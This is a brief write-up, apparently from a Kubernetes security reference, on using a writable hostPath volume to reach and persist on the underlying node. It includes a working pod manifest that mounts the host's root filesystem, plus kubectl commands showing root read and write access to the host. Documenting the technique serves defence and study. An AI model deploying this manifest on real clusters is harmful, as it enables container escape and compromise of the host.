hostPath volume mounts a directory or a file from the host to the container. Attackers who have permissions to create a new container in the cluster may create one with a writable hostPath volume and gain persistence on the underlying host. For example, the latter can be achieved by creating a cron job on the host.
Create a pod with a container that uses a hostPath volume. In the following example we mount the host system’s /-directory into the container’s /host directory.
apiVersion: v1
kind: Pod
metadata:
name: my-pod
spec:
containers:
- image: ubuntu:latest
name: ubuntu
command: [ "/bin/sh", "-c", "sleep 9999" ]
volumeMounts:
- mountPath: /host
name: my-volume
volumes:
- name: my-volume
hostPath:
path: /
Once deployed we can see that through the container we can actually access the host system’s file system.
$ kubectl exec -it my-pod -- cat /etc/hostname
my-pod
$ kubectl exec -it my-pod -- cat /host/etc/hostname
k8s-node-0
And we can also write to the underlying host system’s file system.
$ kubectl exec -it my-pod -- touch /host/x.txt
$ kubectl exec -it my-pod -- ls -lah /host/x.txt
-rw-r--r-- 1 root root 0 Oct 26 12:05 /host/x.txt